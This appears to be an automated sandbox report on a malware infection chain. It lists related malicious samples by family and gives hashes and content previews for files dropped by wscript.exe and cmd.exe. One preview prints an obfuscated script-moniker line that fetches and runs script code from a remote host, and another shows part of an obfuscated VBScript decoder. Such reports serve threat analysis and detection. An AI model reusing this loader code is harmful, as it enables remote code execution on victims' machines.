                                                            out.jsGet hashmaliciousUnknownBrowse
                                                            • 206.71.149.162
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\wql455oi0\lp1a3new_order_inquire_#2308.exeGet hashmaliciousDarkCloudBrowse
                                                              DOC001.exeGet hashmaliciousAgentTeslaBrowse
                                                                IDESA_cotizacion.exeGet hashmaliciousFormBookBrowse
                                                                  Kms_P1co.zipGet hashmaliciousUnknownBrowse
                                                                    7SUpFOJ22H.exeGet hashmaliciousRedLineBrowse
                                                                      Payment2023.png.lnkGet hashmaliciousRedLineBrowse
                                                                        Nestle_0093266.exeGet hashmaliciousFormBookBrowse
                                                                          MJmNRo1rSC.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Especificaci#U00f3n_Cotizaci#U00f3n_DOC6467.exeGet hashmaliciousAgentTeslaBrowse
                                                                              DHL_DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                16904941841bdcd529d18d1719e97bd155d650a7d3789c12cda2bd13eb568705155674f42c725.dat-decoded.exeGet hashmaliciousAmadey, RemcosBrowse
                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                    KTkoS5DGmy.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      Latest_Setup.exeGet hashmaliciousCryptbotV2Browse
                                                                                        documentoFactura1.jseGet hashmaliciousUnknownBrowse
                                                                                          documentoFactura1.jseGet hashmaliciousUnknownBrowse
                                                                                            SUNAT_Documento3345278.cmdGet hashmaliciousUnknownBrowse
                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                                setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  doc_Factura_568947.rarGet hashmaliciousUnknownBrowse
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6268929
                                                                                                    Entropy (8bit):7.481378985443105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:SkMdmYyU9wpjEyYOsESNTQGizsZT+Yqr5WlHM0uzZ5qCq01D/d83abo8P1pb8P10:SxPyWwpjz3OGfolHjz09d8GK/t2p
                                                                                                    MD5:450B07DAC0AC61A5F472EDB8D1388FB4
                                                                                                    SHA1:1BC78645F065160D7C8EF303FB7C54CD675A91FA
                                                                                                    SHA-256:E65C5B198D5B51945875ADCE98E36FB2DC1B00FF03BE6152D5F335F15C32B532
                                                                                                    SHA-512:8FBE63D331FB7CEC246945556AC036FB108D4996839FA1B85EF751A09983985046BA74C948D3BAD3D21D37C85EFACF726EDE8A3D33C850676244AD360F394BAD
                                                                                                    Malicious:false
                                                                                                    Preview:.bpg.....!.$.............Y.5......................................*.*<...8..f.=..i~..9.....v.7....<..5...9.....5m..LL(&AU........................................................................................................................................ka..a.!..5.............. ..1.XO...@......pQ..&...zO...U..(..............".........}...........U...)..\....'..*......'.............Q.Qa....T...A..................LT..i...........................>L./.....................O..&....N.C$..................G......./.M..,....K.................5..xG........<...LQ..<...6O.............5..xG~|.~........|Q......\O.............U...G|......ov...lS......HQ.................G..}....K[....S..Z...HQ.............U...G~..~.v.A"....T.."....Q.............U...G.......[....,T.......Q.................G..}..../....<T.......Q.............U..XG........k...LT..j....Q.............U..ZG.........=...X...;...U.............U..X..............}.......z.............U..X.......................................................
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146
                                                                                                    Entropy (8bit):4.209312746469177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Myx40tiUvt2tvJyR4bjWytwWVkF71Xx4TW2MBfEovwmTtT:Myx40QUItvJxHWytwWqbyTxyJv7TtT
                                                                                                    MD5:60937323F3D67AC4E2C37CE2B095396D
                                                                                                    SHA1:C7521AD57185451D6E49F5EAA6710DE9BEBEE472
                                                                                                    SHA-256:F068E1BD99AE05415F0496476747499CBD8CFC32E0DFE6EE94E84F533A449BDC
                                                                                                    SHA-512:25DC36D2087CEB0DC521EBCF3F360FC86EE5BBDF683940FB6FFCCBED6430E5CA47DF76F5940122C0EAFA3FC612F2A4C876E2172487D596773F15DE1A2A9D9957
                                                                                                    Malicious:false
                                                                                                    Preview:VFQ..TDJDD..QHLFUHEIGIAHUFOFPFPHXHRFKHE..BGXGYEWGWHMHCHIEXEYEW..WFSFUFT..RHOHPFNHNIDHSHYFOFPFN..YFUFWFRFTFSFRFUFSFUFV..DEXFC..VFQ..UFP..OFJ..HFC..
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:ASCII text, with very long lines (3027), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3029
                                                                                                    Entropy (8bit):3.500056937995765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VspCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCGtjwTstuTE5tITK1vtqTOtPnTntRTlZ:ucwzgAUUI7zbxdnWfn4YXKxy8wcLN
                                                                                                    MD5:2A6ECAF3A708D6C73986A0D0F31B6CEE
                                                                                                    SHA1:7DB214A7D4C75132F87845331BC8AD1956F8790E
                                                                                                    SHA-256:8A0868B6D4389C2BE62DD9AB4B8EE2FC56A8F3644409771DF7211ADD54001595
                                                                                                    SHA-512:81A5807E1C7A9024CEFD2A14A10AAAA15B5DF2B0F0C6E03D7B7F124DC0E16668BC5F51C461A9151CA8C342616986DC194E5017A8A5421D2BE65748592D2F7A2D
                                                                                                    Malicious:false
                                                                                                    Preview:VDJDBFRDLFXFOFYFYDLDBCTFOFVCTDBCTGDFVDICTDBCTGDFVDJCTDBCTGDFVDKCTDBGBFJGEDIDKDQDODBFSGAGEFMFGGFDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXGCFKFVFOFIFYDFFIFUFSDBFSGEFMGCDJGDDIDFFYFKFXG
                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):133
                                                                                                    Entropy (8bit):4.597169768172968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:iTRIcdTc2OpyP184GRn9ehh4SQBsUDRCFOZRTOWMjKczxdoT:AdTcppytfwAQBlDRYOvTOWq9doT
                                                                                                    MD5:EA66E1733918B58BE956505F4FEFFB65
                                                                                                    SHA1:A93C137AAE5D4E6680A35E16278540E89146F7AB
                                                                                                    SHA-256:1DF43E2C1950360C693B42F002FCA7911B5F6696FCC2E770958816110B0E589A
                                                                                                    SHA-512:F741362A0B6253A5E22052443042C3283BD0BC1E76665BF27D6B4E5B99F86D01B325A6FC2365206EB482B8E7104A31452918721B61EFC99C18A729377165E4D6
                                                                                                    Malicious:true
                                                                                                    Preview:sq048=".":r54="i":y8628="g":k4js7=":":GetObject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:HTML document, ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):315
                                                                                                    Entropy (8bit):5.233796231796999
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPG+RBKRCwFxBFm8oD:J0+ox0RJWWPGsgtm8+
                                                                                                    MD5:6671DB1F87E91E4201E680711AA76C8E
                                                                                                    SHA1:1512FDDA11FC55895D83916CE16B81FAA7FFAEA6
                                                                                                    SHA-256:0D692373817FCB096B3510B48F0C1D6905C37054039A9250679FA9D5308CD44E
                                                                                                    SHA-512:6FD5FB418E68D26D981E5F59CCF002F2F1BBA11D0FC64A8379D400F29694FF58FB977CE39346F5176AFD4FD7C3C32BE1A3474B3D7D4D0201A6CD199326439F03
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://m4gx.dns04.com/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.52 (Ubuntu) Server at m4gx.dns04.com Port 443</address>.</body></html>.
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):267986
                                                                                                    Entropy (8bit):7.9993579032027
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:xzBD9WIL9pWZp2c9mNewl4mHVaXQBnRpju0SADyROBtw0ixUv:xVD9WePWZproNJDQXwju0BMaiyv
                                                                                                    MD5:69F1C85ED7640BB633E646A9813EB3F7
                                                                                                    SHA1:75E359F6838F4CA5DB7E5F46B644A876081E5843
                                                                                                    SHA-256:6102A9C1301304FE1C2CA7652F55CB202AC98E16D89E11DC3BE7272C845155B0
                                                                                                    SHA-512:BE5DAEBA3FB37F02F74E392DEDAD4CA742FE5DCDCA246CEF48B4E8F06A8C134D796C921E06A7287F66906019CA32E7437ADF255B7491FA56850D2FE172B08555
                                                                                                    Malicious:false
                                                                                                    Preview:'ws,.?,-670..F.P/..F+(;@/,1./0..Z^+Fm...os..v..{.1..r.m.aPuhX_w.+.R.l..;.......j.{..,-..jH.R...8.]p.....r..kH....f.k..Z.=..C..0.:.'.....|J.()7...YN.tF@.q.....zUX...lm...#.mI..Va..5...e9.c..O...9.v....9?..]$.C,..u......9..ln..$Du.dN3....../....XvQ=...Y.0.)*.-...'(...-......+....s.z..+,.)T...<#.I...0.}V...UC. .M..<....o...I$-...PJ.x.O..'.DV."..nb.x..B......p......SsW^6...=...]P."T..)..R..E.).....`...).h.......5..X..}Q.N.L;.'.X.o9.mo....,....3*$.0-#.C'.B.#...0.3......d..$$...Z... ._..9....P.....#.0W^.M....a..S.....u.........8..U...v.."z.....-.....@.>.k..>-..Rh..La..4v...3.t...6..MAa^,.....y..o(...PK?.#...xA.x.mJ.....{.#..Zo.....q..]Y3.._....M..=5.30O..i2....A...0....O<...v.<I.#...>&)......H....X..%T.{..y.G....d$.O....8...H.@..-W.......9sh.]i..g.}.....E']rb}.1..vK....8...uB....m...g.....x!.o?....0..L.O...E...B..w........n......l..._[.f.....Q.....9..lUX`.@".....Z_.EOA.gJ..._....... ./.....O..#...`..w...Tr..A.d.k..8y`.@.{.q..e.o.....]....W..
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75
                                                                                                    Entropy (8bit):3.360205991623169
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:bqFNmjjLmyWY2SmPqFNmjmswmYwn:bqejufnqejmswS
                                                                                                    MD5:52E373B85CA07452EA95AAC4B42CCD07
                                                                                                    SHA1:2D2F7115BDA7075A3711FD1E1D569981A0B48F9A
                                                                                                    SHA-256:DA75E54A65AFE9BF2369ABEA866D8EE5FF7962B008538D0434CC02E72E234127
                                                                                                    SHA-512:518CCAC0B1D2B3623961FCC7D7CA086841F77B653AEBAAB828E8D3168FAE287DABFA3CFD68F48CBED1F15B95129DE154F45A20A198E6926366581D595EB4DDD2
                                                                                                    Malicious:false
                                                                                                    Preview:HEVEWCUEUFKFAFGCVCWCUCFFOFIFDCWCXCXFGFACSCFEVEWCUEUFKFAFGCVCWCUCFCVDBCUCFAU
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4361165
                                                                                                    Entropy (8bit):7.995000411667346
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:2zwaBU6dIESFphgbVZ0Pl0wQ/EkA0/A+jbeOA/PUteJh8Pji+yrd7/:uwa66drSF99eMjdCEs2OSl
                                                                                                    MD5:95D33059085CD2681BBB402708A6FB54
                                                                                                    SHA1:B2FA74C98643243AF35FDE71F899301045DAF422
                                                                                                    SHA-256:7C8007334E8D4E36940BD3C8933F30806F00E0240F5EB24538513738CA94148C
                                                                                                    SHA-512:051FFB35FB54F0A3044F3FD8F348095B1924B012E6F822F4F913C497265C443230EF1C9349A36DE6E1AC69BFA70B117A7667802C74FCCD90DB1BD45F76CA8E5E
                                                                                                    Malicious:false
                                                                                                    Preview:PK.........k.W.f7Sc.B..._.....lp11..w\.g.8n.4...}.0t.I..K..+ .(.............f.{7...d..&...lz,..XbLb..E..y..h.&........3.9.<...<...t.$HJ..........._....=.p...|.../B...3g_.......^.+...f..V..[i1[.*4..MU.z..6;WY.~}.tY./`...Sv.....gOP...^m...Y..M..]...`...2Xc".. ......'..l.1<.[."8,. ...@.....>...P[R.S.v....iN.og.3..~....3..[....}......U...;|.... .`-b..3O....JVi...5<.......B.v.....69...%.....`...$.H.........Z.6...[~...U.........?...i8..\.....I..v.'.oM?.g.t..Z.v..#?A...ee......U&e.I...Y..@G.O..2Y,J..."..............'4.l.}z......|.C.(Q@te.V^.....J(.!.K.&...Z[Fe.M..^....!h.DS."VYf.......4i4&a..r..h..E.....`...*.y..F;|y........./0..5):.M5..C.|..|.x....(.S....}...g..$.j....4. ..ED.1.@oV.......C.1./.,..eF......MV..UeU"...*K7<0......k<.B\...,.M.1D..(]c.~D.#B....P./p.~...,..z..m@.3.^J...+.<.....'.s;.Ey..JU9:............j..D...F..,.:.....|BQ..X..2.63.OR..j....0."..0...j.A1.6..$..>r..*S......Y.i.Fu.Ff.....t.s..Pqf.V.N.......d.-$.`.....ct.UH...1....~q.5F9.o...
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (3059), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26251
                                                                                                    Entropy (8bit):5.917089437699929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:39AsDMthWm9pxckfJsStdpSvLdO4SGuWt3QQ4CTdvTP8MWQunMDQMQSMIQlQH:39AFD9pxc2Js74CTdvTP8MWpMDrLMI2q
                                                                                                    MD5:FDCF97EB61997D416AFCD540A64C7D62
                                                                                                    SHA1:951B95F6038CF8FEA6DE50DA3C766FF516418C63
                                                                                                    SHA-256:3CD232A70C2B7B1EFC82A4493FE49979DCC78EA18E0EABB5EA5FAAD0F03765ED
                                                                                                    SHA-512:8F55B228240FE7BB942E3C78E0AEA68D372DA33BB9CFFA1DB0E5D4A245D0D99F86FAA5D639816CE09B4C4871E205C35A56568C900B16218C38E4C1166F0DC9CE
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function deTjgjPkUyZE1iINoy_17(LUFLTDdiQbW2s_26, zZLnA5w2qy3PS_1)..Dim vArfy3gQ0fcq4b7T1RsXjP_27, SUwGtyZySnyKOkRRXAv23N_28..vArfy3gQ0fcq4b7T1RsXjP_27 = asc(Mid(LUFLTDdiQbW2s_26,1,1)) - 65..LUFLTDdiQbW2s_26 = Mid(LUFLTDdiQbW2s_26,2,Len(LUFLTDdiQbW2s_26)-1)..Dim Ivahche8kG84cUWwWE5c_29..Dim XVS9eeUa0ZOGkJKXO8_30..SUwGtyZySnyKOkRRXAv23N_28 = "".. while (Len(LUFLTDdiQbW2s_26) > 0).. UPAOAXK1hdn2FpK03KEls2_80 = Mid(LUFLTDdiQbW2s_26,1,1) .. Ivahche8kG84cUWwWE5c_29 = (asc(UPAOAXK1hdn2FpK03KEls2_80)-65) .. XVS9eeUa0ZOGkJKXO8_30 = (asc(Mid(LUFLTDdiQbW2s_26,2,1))-65).. SUwGtyZySnyKOkRRXAv23N_28 = SUwGtyZySnyKOkRRXAv23N_28 & (Chr(( (Ivahche8kG84cUWwWE5c_29) * 25 + XVS9eeUa0ZOGkJKXO8_30 - vArfy3gQ0fcq4b7T1RsXjP_27 - zZLnA5w2qy3PS_1))) .. LUFLTDdiQbW2s_26 = Mid(LUFLTDdiQbW2s_26,3,Len(LUFLTDdiQbW2s_26)-2).... wEnd.. .. deTjgjPkUyZE1iINoy_17 = SUwGtyZySnyKOkRRXAv
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):486993
                                                                                                    Entropy (8bit):7.999119022567114
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:pl3RNmchhZg8pqX6/IR+uOtQL8W3xQUSxic/:pl3RUchHt4c8xplxcxic/
                                                                                                    MD5:AB9BBDD85D280B71BB4920677462C75D
                                                                                                    SHA1:DD46BBCCFD75636B171674C803FBB65946508CE2
                                                                                                    SHA-256:5397CD8246756DFE42BA151665213DC31B48EE25C4939A0263DAEB1DF8A256CB
                                                                                                    SHA-512:E5246EA54B2C55817649AFB75B5C7F7253153FBBDB6B5D2A010A14E1819F1A7344B95CC993EA526364EC50592F403DB3F22E875AB932B96B00F9F6C27D04F3CA
                                                                                                    Malicious:false
                                                                                                    Preview:<..ACTABKLEt.q.Y...(.C=..NAGCDE..o.s-....7>.....K4.......R)..rD.+dw_f.....,..B..X%.^.......=.../..mE...l.Z..+.....fb...&./..#B:.=.O.9...'....4.v......d.2+.iq....5A@......r....C.t...( ...n.3...3.];.{_.3e.6..oJ~..4.&....a....tbdM........6?u.P.8Xt.\...-....-d.."..3.....9!.@%...Y..8.9..&.....y..8....?>3.7....0y7...&<^...7...$..W...z...."..!qM....v.x!f*Va...M.aNd..0.Nt.R9MRn.i.#q.[...z..+.......X?H.......e..}t......2.`s...#V...Dns[.m.l.P6S.c...;..9B<.j<1....=M...q..hr....{=....{.W./.9^.s.D3%..f.2...c.A..@...Y.l..`...s..0/A.-....6=P....2..A.`i@...<.J?@.6C.5li.|..n...b.(v......c9./.j.HD.YB...1xJw9DHW...M0a..d.x..P..%.'[.._.g...5.wB..B.yF....p!.......DC.]D.BD.....V..@.>se=E.4..P...Y..........&..p............z..B..*........t.....O4d`.8"...e....K.....o...O..H...Qb.>...f;......G.&.F'..[:.4.z\....j..T.2~.^).F!.|%u.qdgl..Bt.k...Jp.!......\...C....>b.......y......y...!..6N..cI..7...jWz`F...\iS...U.+!h/....G..._...s."Hj..........{m....bG....... 9....*u.s....x.
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6144
                                                                                                    Entropy (8bit):4.132654999696168
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rKsPtLu1vVW0T1MqughNY1IkAKOSuPlQ2SuHxpknIxadRS8mu9SZZqu3pb:Tq9J4ClVORdR9Ip
                                                                                                    MD5:F2FAFF6F3CA8944A11AF0E1BE9369007
                                                                                                    SHA1:D62D93DE60D3CEE6F6B2801993DDB23FDDE4EF16
                                                                                                    SHA-256:230C17956EDBCCB59A351DF8E9989AFF828F76D039801538BE672AA8BCFCA69C
                                                                                                    SHA-512:1C6574BD5B461CA5B38FC27686229C769F3D8D8D0542E1ACCE992B8E51D5E3E96DE2728363E13B77A4F9D41DC1E2598B3D1E125E416903034856E92B9D91428A
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):267986
                                                                                                    Entropy (8bit):7.9993579032027
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:xzBD9WIL9pWZp2c9mNewl4mHVaXQBnRpju0SADyROBtw0ixUv:xVD9WePWZproNJDQXwju0BMaiyv
                                                                                                    MD5:69F1C85ED7640BB633E646A9813EB3F7
                                                                                                    SHA1:75E359F6838F4CA5DB7E5F46B644A876081E5843
                                                                                                    SHA-256:6102A9C1301304FE1C2CA7652F55CB202AC98E16D89E11DC3BE7272C845155B0
                                                                                                    SHA-512:BE5DAEBA3FB37F02F74E392DEDAD4CA742FE5DCDCA246CEF48B4E8F06A8C134D796C921E06A7287F66906019CA32E7437ADF255B7491FA56850D2FE172B08555
                                                                                                    Malicious:false
                                                                                                    Preview:'ws,.?,-670..F.P/..F+(;@/,1./0..Z^+Fm...os..v..{.1..r.m.aPuhX_w.+.R.l..;.......j.{..,-..jH.R...8.]p.....r..kH....f.k..Z.=..C..0.:.'.....|J.()7...YN.tF@.q.....zUX...lm...#.mI..Va..5...e9.c..O...9.v....9?..]$.C,..u......9..ln..$Du.dN3....../....XvQ=...Y.0.)*.-...'(...-......+....s.z..+,.)T...<#.I...0.}V...UC. .M..<....o...I$-...PJ.x.O..'.DV."..nb.x..B......p......SsW^6...=...]P."T..)..R..E.).....`...).h.......5..X..}Q.N.L;.'.X.o9.mo....,....3*$.0-#.C'.B.#...0.3......d..$$...Z... ._..9....P.....#.0W^.M....a..S.....u.........8..U...v.."z.....-.....@.>.k..>-..Rh..La..4v...3.t...6..MAa^,.....y..o(...PK?.#...xA.x.mJ.....{.#..Zo.....q..]Y3.._....M..=5.30O..i2....A...0....O<...v.<I.#...>&)......H....X..%T.{..y.G....d$.O....8...H.@..-W.......9sh.]i..g.}.....E']rb}.1..vK....8...uB....m...g.....x!.o?....0..L.O...E...B..w........n......l..._[.f.....Q.....9..lUX`.@".....Z_.EOA.gJ..._....... ./.....O..#...`..w...Tr..A.d.k..8y`.@.{.q..e.o.....]....W..
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):267985
                                                                                                    Entropy (8bit):7.999334055492875
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:qT6qIt5S0jcL6pI/YRFDJKblflC8Gc0jNX0vCceEHNuj8BfMH:pS0cgIaFDoblfY8D0xEreEcj8k
                                                                                                    MD5:02EF3ED827640B2C4D8941B5160D55BE
                                                                                                    SHA1:69CE926BF0147B76E5A6A643C5535E37153BF3A0
                                                                                                    SHA-256:74FEEE28045A45BD5C17EEB91A91292FFEA341F4CDA737C87C8094857ECD57B5
                                                                                                    SHA-512:D7D194572A980D221BBEC58399D7924E6334862C8CC36F0F7C65773B826E0EF1EE03D88AACCBB0C7BE037A17778E034D0C91516E9E33C2E4B5592E04E91BD0DA
                                                                                                    Malicious:false
                                                                                                    Preview:PK........lf.W%..g...........lp14..@.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..].>>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g....x.|_.1N(...+..........................kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@3.Q..\...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. Z....^-.B..=H.{.X.............}................5..m.....,..r..5...x...(nU.j....06.f".].X.:..)...~E.........,.r.Iy..S....e........=.....b'<...1...Lu]...D...v. .2.....Ld.?..[.%....j[.O.yL^?......O\...\2F{..}..J..3...0.j.".}..f..&..=..[.v.|~..w.~.'..^.I.....g.....p.hYx......h....&.K.XP...vy.4..&..ro...j.....{.'....x.l..CA.4?w.i9.M.Y..[S...B;Un.jsI..^...z.W.F....b.@i..@...K.?....._...T.$.%.y...~....Kqr~..df..B.....Bg..1,.?w.a_Y$g......?')0......+/z.&.x;...8.|s].u....V....!....}.5i.Iyk.,IZt..6};.l.O5..dL_J..;bC\...5...*.v.
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):486993
                                                                                                    Entropy (8bit):7.999119022567114
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:pl3RNmchhZg8pqX6/IR+uOtQL8W3xQUSxic/:pl3RUchHt4c8xplxcxic/
                                                                                                    MD5:AB9BBDD85D280B71BB4920677462C75D
                                                                                                    SHA1:DD46BBCCFD75636B171674C803FBB65946508CE2
                                                                                                    SHA-256:5397CD8246756DFE42BA151665213DC31B48EE25C4939A0263DAEB1DF8A256CB
                                                                                                    SHA-512:E5246EA54B2C55817649AFB75B5C7F7253153FBBDB6B5D2A010A14E1819F1A7344B95CC993EA526364EC50592F403DB3F22E875AB932B96B00F9F6C27D04F3CA
                                                                                                    Malicious:false
                                                                                                    Preview:<..ACTABKLEt.q.Y...(.C=..NAGCDE..o.s-....7>.....K4.......R)..rD.+dw_f.....,..B..X%.^.......=.../..mE...l.Z..+.....fb...&./..#B:.=.O.9...'....4.v......d.2+.iq....5A@......r....C.t...( ...n.3...3.];.{_.3e.6..oJ~..4.&....a....tbdM........6?u.P.8Xt.\...-....-d.."..3.....9!.@%...Y..8.9..&.....y..8....?>3.7....0y7...&<^...7...$..W...z...."..!qM....v.x!f*Va...M.aNd..0.Nt.R9MRn.i.#q.[...z..+.......X?H.......e..}t......2.`s...#V...Dns[.m.l.P6S.c...;..9B<.j<1....=M...q..hr....{=....{.W./.9^.s.D3%..f.2...c.A..@...Y.l..`...s..0/A.-....6=P....2..A.`i@...<.J?@.6C.5li.|..n...b.(v......c9./.j.HD.YB...1xJw9DHW...M0a..d.x..P..%.'[.._.g...5.wB..B.yF....p!.......DC.]D.BD.....V..@.>se=E.4..P...Y..........&..p............z..B..*........t.....O4d`.8"...e....K.....o...O..H...Qb.>...f;......G.&.F'..[:.4.z\....j..T.2~.^).F!.|%u.qdgl..Bt.k...Jp.!......\...C....>b.......y......y...!..6N..cI..7...jWz`F...\iS...U.+!h/....G..._...s."Hj..........{m....bG....... 9....*u.s....x.
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
                                                                                                    Size (bytes):486992
                                                                                                    Entropy (8bit):7.998036809684333
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:kp3yQJLjC1pn9kSJNE89AGUsojoZcsZJ2yKI+fuN:kp3NLepn9L9q3jBsZ4ygmN
                                                                                                    MD5:A4DB1E03453FBA757BA0677DC4EF5E13
                                                                                                    SHA1:09E23C0A52157952E6EF6DC267A22DF95F5811F2
                                                                                                    SHA-256:52BB35795BC48DD4598A95562F9C37B6E7ACD1ADAACFBDE688F3798AB7269206
                                                                                                    SHA-512:D01E10C093742D3A04BBD8BB30813D848D2230F46118135E7D4F9477879640D839233CB9E71CC6056F8B6D8E69B2D04064F21C044E267CA22CB6D943589280B9
                                                                                                    Malicious:false
                                                                                                    Preview:PK........8}3U.G...m..Xt......lp1a3._TU..~...U..P.X.cQZK...2... 2#)`eD........x....v....n..n.b/.b..)........".....y....~...>..s..s...3..o..$...$5H._.....j...W.1\z}..W6.f~p..{../^..=K.x ..;.|.!...w./.<.~..y....xh..7$%.......gG..4V.<..7V.....azO..%..U..{..w.m...{...|..x.......]\.Ne5U..rc....}....|.7.......o.......{..?.6.S.f..kwd.5.v\..4.4.*.."I.e.K..'IV.t.1z..../.(~.-m.N..:S.............H..$.?9/b.pi........IR.....26..-R*.....%..Y.......+..~}....U.0M.$-.a.;.wH.?..m...C.H....`$.._.u[$....g....,]..Mm.6K...._.rnXr...ABl;......'.g.i.w......v./+.D;..*vM.$..5I..UO..$.E.W&.j......<.T.;.8.........".|A![3m.R......{s!~'.C.t:.....6.Z..J.0.wF............Rt`....K...O.3$..C....u..{..F..t.nE.G.3.}|..=....9...Du.U....l8.yA.....$...cA."...Z..A.e>.*zwb..`..Y..$...X.".SP..o....M......~.]5 ..g)z.O.D.@......z@.7.1#%)..7],K...,....C\.D.:{c...|~..E.V{x@.7z...I]K9f.>....xI"..v....T..(.6..cS..(.qMy..U..'.G....mV......g..+...VV...SYy:+...W%.....g.g.......Of.9.5....5..
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                    Category:dropped
